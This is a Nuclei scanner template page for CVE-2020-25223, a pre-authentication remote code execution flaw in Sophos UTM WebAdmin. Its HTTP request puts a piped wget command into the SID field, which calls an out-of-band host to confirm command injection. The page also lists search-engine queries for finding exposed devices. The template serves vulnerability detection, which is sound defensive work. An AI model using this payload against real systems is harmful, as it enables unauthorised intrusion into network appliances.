Skip to content
Nuclei Templates

Sophos UTM Preauth - Remote Code Execution

ID: CVE-2020-25223

Severity: critical

Author: gy741

Tags: cve,cve2020,sophos,rce,oast,unauth,kev

Description

Section titled “Description”

Sophos SG UTMA WebAdmin is susceptible to a remote code execution vulnerability in versions before v9.705 MR5, v9.607 MR7, and v9.511 MR11.

YAML Source

Section titled “YAML Source”
id: CVE-2020-25223


info:
  name: Sophos UTM Preauth - Remote Code Execution
  author: gy741
  severity: critical
  description: Sophos SG UTMA WebAdmin is susceptible to a remote code execution vulnerability in versions before v9.705 MR5, v9.607 MR7, and v9.511 MR11.
  impact: |
    Successful exploitation of this vulnerability could lead to remote code execution, allowing attackers to take control of the affected system.
  remediation: |
    Apply the latest security patches provided by Sophos to mitigate the vulnerability.
  reference:
    - https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223
    - https://community.sophos.com/b/security-blog/posts/advisory-resolved-rce-in-sg-utm-webadmin-cve-2020-25223
    - https://nvd.nist.gov/vuln/detail/CVE-2020-25223
    - https://community.sophos.com/b/security-blog
    - https://cwe.mitre.org/data/definitions/78.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-25223
    cwe-id: CWE-78
    epss-score: 0.97521
    epss-percentile: 0.99989
    cpe: cpe:2.3:a:sophos:unified_threat_management:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: sophos
    product: unified_threat_management
    shodan-query: http.title:"securepoint utm"
    fofa-query: title="securepoint utm"
    google-query: intitle:"securepoint utm"
  tags: cve,cve2020,sophos,rce,oast,unauth,kev


http:
  - raw:
      - |
        POST /var HTTP/1.1
        Host: {{Hostname}}
        Accept: text/javascript, text/html, application/xml, text/xml, */*
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        X-Requested-With: XMLHttpRequest
        X-Prototype-Version: 1.5.1.1
        Content-Type: application/json; charset=UTF-8
        Origin: {{BaseURL}}
        Connection: close
        Referer: {{BaseURL}}
        Sec-Fetch-Dest: empty
        Sec-Fetch-Mode: cors
        Sec-Fetch-Site: same-origin


        {"objs": [{"FID": "init"}], "SID": "|wget http://{{interactsh-url}}|", "browser": "gecko_linux", "backend_version": -1, "loc": "", "_cookie": null, "wdebug": 0, "RID": "1629210675639_0.5000855117488202", "current_uuid": "", "ipv6": true}


    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 4a0a004730450221008df205cfdedc09609bcb88b22262b9626ef80e3692b1959055c24ba024e4340f022028c9a12078ac80c4e6361fd8195659c4a01def8953df48a266f005341768c909:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-25223.yaml"

View on Github